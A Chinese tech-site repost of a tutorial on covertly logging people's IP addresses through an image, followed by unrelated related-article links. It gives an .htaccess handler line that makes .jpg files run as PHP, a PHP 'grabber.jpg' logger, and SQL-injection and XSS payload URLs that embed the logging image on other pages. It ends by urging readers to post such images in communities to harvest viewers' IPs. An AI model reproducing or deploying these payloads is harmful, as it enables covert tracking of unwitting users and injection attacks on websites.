0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

如何通过一张照片来获取ip地址?

dyquk4xk2p3d 来源:良许Linux 作者:良许Linux 2022-12-14 10:31 次阅读
加入交流群
微信小助手二维码

扫码添加小助手

加入工程师交流群


	

在本教程中,我们将学习如何用一张照片来盗取ip地址。我的想法是通过修改.htaccess文件,将jpg文件当作php文件来解析。

下面就是我们需要向.htaccess中添加的代码:

AddHandlerapplication/x-httpd-php5.jpg

然后将下面的代码复制到记事本中,命名为grabber.jpg


$fh=fopen('ip_list.txt','a');
fwrite($fh,$_SERVER['REMOTE_ADDR']."
");
fclose($fh);
$im=imagecreatefromjpeg("n00b.png");
header('Content-Type:image/jpeg');
imagejpeg($im);
imagedestroy($im);
?>

将grabber.jpg的权限设置为755,然后再找一张照片,将其命名为n00b.png,接着放到与grabber.jpg相同的目录之中。

就这样,一切工作就绪了。当别人浏览grabber.jpg这张照片的时候,他的ip地址就会被记录下来。

(译者注:需要把这些东西上传至我们的个人网站空间中)

POC:

(译者注:作者这里贴了一张可获取ip的演示照片,为了大家的隐私,我没有将其贴出,读者可自行去作者博客查看)

至此,我们的照片已经可以开始工作了。

接着我还想说明一下如何使用SQLi来获取ip地址。其实使用照片来盗取ip地址十分快捷,我们没有理由去使用SQLi这种方法,但是为了让读者获取到更多的知识,我还是说明一下吧:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'unionselect1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c61622f696d61676569702f7472796d652e6a7067223e,3#

现在,再说一下如何使用xss来获取ip地址:

http://leettime.net/xsslab1/chalg1.php?name=<imgsrc="http://leettime.net/idiots_test_lab/imageip/tryme.jpg">&submit=Search

好了,就是这些了。

我们可以用这个技巧做许多有趣的事情,事实上大部分社区都允许我们发布一些照片,所以我们可以用这个方法去获取所有访问到我们照片的人的ip地址。

审核编辑 :李倩


声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • IP
    IP
    +关注

    关注

    5

    文章

    1895

    浏览量

    157076
  • 代码
    +关注

    关注

    30

    文章

    4985

    浏览量

    74590

原文标题:如何通过一张照片来获取ip地址?

文章出处:【微信号:良许Linux,微信公众号:良许Linux】欢迎添加关注!文章转载请注明出处。

收藏 人收藏
加入交流群
微信小助手二维码

扫码添加小助手

加入工程师交流群

    评论

    相关推荐
    热点推荐

    自动驾驶有了占用网络还需要卷积神经网络吗?

    在占用网络流行之前,自动驾驶的主流感知方案是基于CNN的目标检测。你可以把它想象成给摄像头拍到的每一张照片画框。
    的头像 发表于 05-04 18:05 3497次阅读
    自动驾驶有了占用网络还需要卷积神经网络吗?

    海外静态IP和海外动态IP有哪些区别?怎么选择?

    这个问题其实对于需要做跨境、电商、社媒运营的人问的比较多,所以本篇内容为大家详细介绍下,具体如下: 、什么是静态IP、动态IP? 1、静态IP
    的头像 发表于 04-13 12:36 244次阅读
    海外静态<b class='flag-5'>IP</b>和海外动态<b class='flag-5'>IP</b>有哪些区别?怎么选择?

    如何通过1688开放平台API获取指定店铺所有商品

    实现这功能。 、核心接口:alibaba.product.getSellerProductList 这是1688开放平台提供的用于获取卖家商品列表的API。通过合理配置请求参数和分
    的头像 发表于 03-16 17:23 845次阅读
    如何<b class='flag-5'>通过</b>1688开放平台API<b class='flag-5'>获取</b>指定店铺所有商品

    通过1688开放平台API根据商品ID获取商品详情

    开放平台提供了 获取商品详情 接口,允许开发者通过传入商品ID查询该商品的详细信息。该接口返回的数据结构包含了商品的基础属性、价格、库存、图片、规格等关键信息。 2. 请求方式 接口名称 :
    的头像 发表于 03-10 17:08 796次阅读
    <b class='flag-5'>通过</b>1688开放平台API根据商品ID<b class='flag-5'>获取</b>商品详情

    如何高效修改西门子PLC的相同IP地址

    随着“智能制造”与“工业4.0”的持续推进,越来越自动化设备需接入信息化管理系统,但很多企业在早期设备采购或新增设备时,往往缺乏对设备 IP 地址进行统规划,导致不同厂家设备或同型号多台设备出现
    的头像 发表于 12-16 13:52 722次阅读
    如何高效修改西门子PLC的相同<b class='flag-5'>IP</b><b class='flag-5'>地址</b>

    谁有P660电路图给传一张,谢谢

    哪位师博有德生PL660电路图给传一张,谢谢各位师傅。
    发表于 12-08 18:47

    一张照片实现唱跳+对口型?千问App新玩法!

    行业资讯
    脑极体
    发布于 :2025年12月02日 22:06:44

    工业NAT网关实现PLC、机床等设备IP地址冲突的解决方案

    在工业自动化项目中,工程师经常会遇到个问题——IP地址冲突。比如台编写好程序的自动化设备,其内部PLC的IP
    的头像 发表于 11-06 16:58 986次阅读
    工业NAT网关实现PLC、机床等设备<b class='flag-5'>IP</b><b class='flag-5'>地址</b>冲突的解决方案

    城市一张网,以数据之桥擎托未来

    以“城市一张网”为基石,打造可信数据空间,赋能全域数字化转型
    的头像 发表于 10-14 09:29 2272次阅读
    城市<b class='flag-5'>一张</b>网,以数据之桥擎托未来

    w5500dhcp无法获取ip怎么解决?

    spi驱动w5500,mac地址写入读取成功,但是获取ip、子网掩码都是0;
    发表于 09-26 06:58

    一张图搞懂LDO的硬件设计和应用

    存在误解,这些误解往往会导致设计失败。  ” 我们先通过一张概括 LDO 的应用: 线性稳压电源与 LDO 先澄清个基础的概念 : LDO 是线性稳压电源的
    的头像 发表于 09-23 17:22 9048次阅读
    <b class='flag-5'>一张</b>图搞懂LDO的硬件设计和应用

    IP地址冲突导致德国站群服务器断网的解决方法?

    在网络管理中,IP地址冲突是个常见且令人头疼的问题。尤其是对于依赖站群服务器进行大规模网络操作的企业而言,IP冲突可能会导致整个服务器群组无法正常工作,从而造成严重的业务中断。本文将
    的头像 发表于 08-12 15:47 957次阅读

    CNC的IP地址相同冲突如何解决?

    在网络世界中,每个设备都需要个独特的标识确保信息的准确传输,这个标识就是IP地址。然而,在CNC(数控机床)生产车间中,由于存在多个品牌、不同型号的设备,且这些设备在出厂测试时往往
    的头像 发表于 07-23 14:13 1017次阅读
    CNC的<b class='flag-5'>IP</b><b class='flag-5'>地址</b>相同冲突如何解决?

    如何制作一张自动驾驶高精度地图?

    厘米级的精确参考。那么份能够满足自动驾驶需求的高精度地图到底是如何生成的?其背后又依赖了哪些关键技术? 想要生成一张合格的高精度地图,需要“眼睛”先看懂路,这个“眼睛”来自于多传感器的数据采集平台。常见的做法是借助
    的头像 发表于 07-18 09:08 1106次阅读
    如何制作<b class='flag-5'>一张</b>自动驾驶高精度地图?

    从零开始学IP地址

    IP地址种网络编码,用来唯标识网络中的设备,以确保主机间正常通信。IP地址由32位二进制(
    的头像 发表于 07-08 09:29 2374次阅读
    从零开始学<b class='flag-5'>IP</b><b class='flag-5'>地址</b>